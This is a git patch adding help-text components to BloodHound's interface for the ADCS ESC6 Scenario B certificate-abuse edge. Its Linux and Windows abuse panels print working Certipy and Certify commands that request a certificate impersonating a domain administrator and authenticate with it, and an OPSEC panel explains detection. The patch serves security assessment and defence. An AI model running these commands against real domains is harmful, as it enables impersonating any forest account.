From b3a81f10059a9b09fa6c4b88b33d18727345b02a Mon Sep 17 00:00:00 2001 From: Ben Waples Date: Wed, 17 Jan 2024 11:20:31 -0800 Subject: [PATCH] Esc6b finding entity panel (#312) * init files * lower case b * change labels * renamed to b * also rename sub file * remo0ve a * remove extra the --- .../HelpTexts/ADCSESC6b/ADCSESC6b.tsx | 31 +++++++++++ .../HelpTexts/ADCSESC6b/General.tsx | 44 +++++++++++++++ .../HelpTexts/ADCSESC6b/LinuxAbuse.tsx | 48 ++++++++++++++++ .../components/HelpTexts/ADCSESC6b/Opsec.tsx | 31 +++++++++++ .../HelpTexts/ADCSESC6b/References.tsx | 47 ++++++++++++++++ .../HelpTexts/ADCSESC6b/WindowsAbuse.tsx | 55 +++++++++++++++++++ .../src/components/HelpTexts/index.tsx | 2 + 7 files changed, 258 insertions(+) create mode 100644 packages/javascript/bh-shared-ui/src/components/HelpTexts/ADCSESC6b/ADCSESC6b.tsx create mode 100644 packages/javascript/bh-shared-ui/src/components/HelpTexts/ADCSESC6b/General.tsx create mode 100644 packages/javascript/bh-shared-ui/src/components/HelpTexts/ADCSESC6b/LinuxAbuse.tsx create mode 100644 packages/javascript/bh-shared-ui/src/components/HelpTexts/ADCSESC6b/Opsec.tsx create mode 100644 packages/javascript/bh-shared-ui/src/components/HelpTexts/ADCSESC6b/References.tsx create mode 100644 packages/javascript/bh-shared-ui/src/components/HelpTexts/ADCSESC6b/WindowsAbuse.tsx diff --git a/packages/javascript/bh-shared-ui/src/components/HelpTexts/ADCSESC6b/ADCSESC6b.tsx b/packages/javascript/bh-shared-ui/src/components/HelpTexts/ADCSESC6b/ADCSESC6b.tsx new file mode 100644 index 0000000000..96f5024191 --- /dev/null +++ b/packages/javascript/bh-shared-ui/src/components/HelpTexts/ADCSESC6b/ADCSESC6b.tsx @@ -0,0 +1,31 @@ +// Copyright 2024 Specter Ops, Inc. +// +// Licensed under the Apache License, Version 2.0 +// you may not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. +// +// SPDX-License-Identifier: Apache-2.0 + +import General from './General'; +import WindowsAbuse from './WindowsAbuse'; +import LinuxAbuse from './LinuxAbuse'; +import Opsec from './Opsec'; +import References from './References'; + +const ADCSESC6b = { + general: General, + windowsAbuse: WindowsAbuse, + linuxAbuse: LinuxAbuse, + opsec: Opsec, + references: References, +}; + +export default ADCSESC6b; diff --git a/packages/javascript/bh-shared-ui/src/components/HelpTexts/ADCSESC6b/General.tsx b/packages/javascript/bh-shared-ui/src/components/HelpTexts/ADCSESC6b/General.tsx new file mode 100644 index 0000000000..5927a8f974 --- /dev/null +++ b/packages/javascript/bh-shared-ui/src/components/HelpTexts/ADCSESC6b/General.tsx @@ -0,0 +1,44 @@ +// Copyright 2024 Specter Ops, Inc. +// +// Licensed under the Apache License, Version 2.0 +// you may not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. +// +// SPDX-License-Identifier: Apache-2.0 + +import { FC } from 'react'; +import { groupSpecialFormat } from '../utils'; +import { EdgeInfoProps } from '../index'; +import { Typography } from '@mui/material'; + +const General: FC = ({ sourceName, sourceType, targetName }) => { + return ( + <> + + {groupSpecialFormat(sourceType, sourceName)} the privileges to perform the ADCS ESC6 Scenario B attack + against the target domain. + + + The principal has permission to enroll on one or more certificate templates allowing for authentication. + They also have enrollment permission for an enterprise CA with the necessary templates published. This + enterprise CA is trusted for NT authentication in the forest, and chains up to a root CA for the forest. + The enterprise CA is configured with the EDITF_ATTRIBUTESUBJECTALTNAME2 flag allowing enrollees to + specify a Subject Alternate Name (SAN) identifying another principal during certificate enrollment of + any published certificate template. This setup allow an attacker principal to obtain a malicious + certificate as another principal. There is an affected Domain Controller configured to allow weak + certificate mapping enforcement, which enables the attacker principal to authenticate with the malicious + certificate and thereby impersonating any AD forest user or computer without their credentials. + + + ); +}; + +export default General; diff --git a/packages/javascript/bh-shared-ui/src/components/HelpTexts/ADCSESC6b/LinuxAbuse.tsx b/packages/javascript/bh-shared-ui/src/components/HelpTexts/ADCSESC6b/LinuxAbuse.tsx new file mode 100644 index 0000000000..275e0334c2 --- /dev/null +++ b/packages/javascript/bh-shared-ui/src/components/HelpTexts/ADCSESC6b/LinuxAbuse.tsx @@ -0,0 +1,48 @@ +// Copyright 2024 Specter Ops, Inc. +// +// Licensed under the Apache License, Version 2.0 +// you may not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. +// +// SPDX-License-Identifier: Apache-2.0 + +import { FC } from 'react'; +import { Box, Typography } from '@mui/material'; + +const LinuxAbuse: FC = () => { + return ( + <> + An attacker may perform this attack in the following steps: + + + Step 1: + {' '} + Use Certipy to request enrollment in the affected template, specifying the target enterprise CA and + target principal to impersonate: + + + { + 'certipy req -u john@corp.local -p Passw0rd -ca corp-DC-CA -target ca.corp.local -template ESC6 -upn administrator@corp.local' + } + + + + Step 2: + {' '} + Request a ticket granting ticket (TGT) from the domain, specifying the certificate created in Step 1 and + the IP of a domain controller: + + {'certipy auth -pfx administrator.pfx -dc-ip 172.16.126.128'} + + ); +}; + +export default LinuxAbuse; diff --git a/packages/javascript/bh-shared-ui/src/components/HelpTexts/ADCSESC6b/Opsec.tsx b/packages/javascript/bh-shared-ui/src/components/HelpTexts/ADCSESC6b/Opsec.tsx new file mode 100644 index 0000000000..0200106041 --- /dev/null +++ b/packages/javascript/bh-shared-ui/src/components/HelpTexts/ADCSESC6b/Opsec.tsx @@ -0,0 +1,31 @@ +// Copyright 2024 Specter Ops, Inc. +// +// Licensed under the Apache License, Version 2.0 +// you may not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. +// +// SPDX-License-Identifier: Apache-2.0 + +import { FC } from 'react'; +import { Typography } from '@mui/material'; + +const Opsec: FC = () => { + return ( + + When the affected certificate authority issues the certificate to the attacker, it will retain a local copy + of that certificate in its issued certificates store. Defenders may analyze those issued certificates to + identify illegitimately issued certificates and identify the principal that requested the certificate, as + well as the target identity the attacker is attempting to impersonate. + + ); +}; + +export default Opsec; diff --git a/packages/javascript/bh-shared-ui/src/components/HelpTexts/ADCSESC6b/References.tsx b/packages/javascript/bh-shared-ui/src/components/HelpTexts/ADCSESC6b/References.tsx new file mode 100644 index 0000000000..22c80951f9 --- /dev/null +++ b/packages/javascript/bh-shared-ui/src/components/HelpTexts/ADCSESC6b/References.tsx @@ -0,0 +1,47 @@ +// Copyright 2024 Specter Ops, Inc. +// +// Licensed under the Apache License, Version 2.0 +// you may not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. +// +// SPDX-License-Identifier: Apache-2.0 + +import { FC } from 'react'; +import { Link, Box } from '@mui/material'; + +const References: FC = () => { + return ( + + + Certified Pre-Owned + +
+ + Certipy 4.0 + +
+ + Domain Escalation Edit Attributes + + + ); +}; + +export default References; diff --git a/packages/javascript/bh-shared-ui/src/components/HelpTexts/ADCSESC6b/WindowsAbuse.tsx b/packages/javascript/bh-shared-ui/src/components/HelpTexts/ADCSESC6b/WindowsAbuse.tsx new file mode 100644 index 0000000000..a9b6f1bef5 --- /dev/null +++ b/packages/javascript/bh-shared-ui/src/components/HelpTexts/ADCSESC6b/WindowsAbuse.tsx @@ -0,0 +1,55 @@ +// Copyright 2024 Specter Ops, Inc. +// +// Licensed under the Apache License, Version 2.0 +// you may not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. +// +// SPDX-License-Identifier: Apache-2.0 + +import { FC } from 'react'; +import { Box, Typography } from '@mui/material'; + +const WindowsAbuse: FC = () => { + return ( + <> + An attacker may perform this attack in the following steps: + + + Step 1: + {' '} + Use Certify to request enrollment int he affected template, specifying the affected certification + authority and target principal to impersonate: + + + { + '.\\Certify.exe request /ca:rootdomaindc.forestroot.com\\forestroot-RootDomainDC-CA /template:ESC6 /altname:forestroot\\ForestRootDA' + } + + + + Step 2: + {' '} + Convert the emitted certificate to PFX format: + + {'certutil.exe -MergePFX .\\cert.pem .\\cert.pfx'} + + + Step 3: + {' '} + Use Certipy to connect to the domain controller via Schannel, specifying the PFX-formatted certificate + created in Step 2: + + {'certipy auth -pfx .\\cert.pfx -dc-ip 10.4.0.4 -ldap-shell'} + + ); +}; + +export default WindowsAbuse; diff --git a/packages/javascript/bh-shared-ui/src/components/HelpTexts/index.tsx b/packages/javascript/bh-shared-ui/src/components/HelpTexts/index.tsx index 211f844225..c898b7d475 100644 --- a/packages/javascript/bh-shared-ui/src/components/HelpTexts/index.tsx +++ b/packages/javascript/bh-shared-ui/src/components/HelpTexts/index.tsx @@ -107,6 +107,7 @@ import WritePKIEnrollmentFlag from './WritePKIEnrollmentFlag/WritePKIEnrollmentF import WritePKINameFlag from './WritePKINameFlag/WritePKINameFlag'; import WriteSPN from './WriteSPN/WriteSPN'; import ADCSESC1 from './ADCSESC1/ADCSESC1'; +import ADCSESC6b from './ADCSESC6b/ADCSESC6b'; export type EdgeInfoProps = { edgeName?: string; @@ -207,6 +208,7 @@ const EdgeInfoComponents = { GoldenCert: GoldenCert, ADCSESC1: ADCSESC1, ADCSESC3: ADCSESC3, + ADCSESC6b: ADCSESC6b, ManageCA: ManageCA, ManageCertificates: ManageCertificates, WritePKIEnrollmentFlag: WritePKIEnrollmentFlag,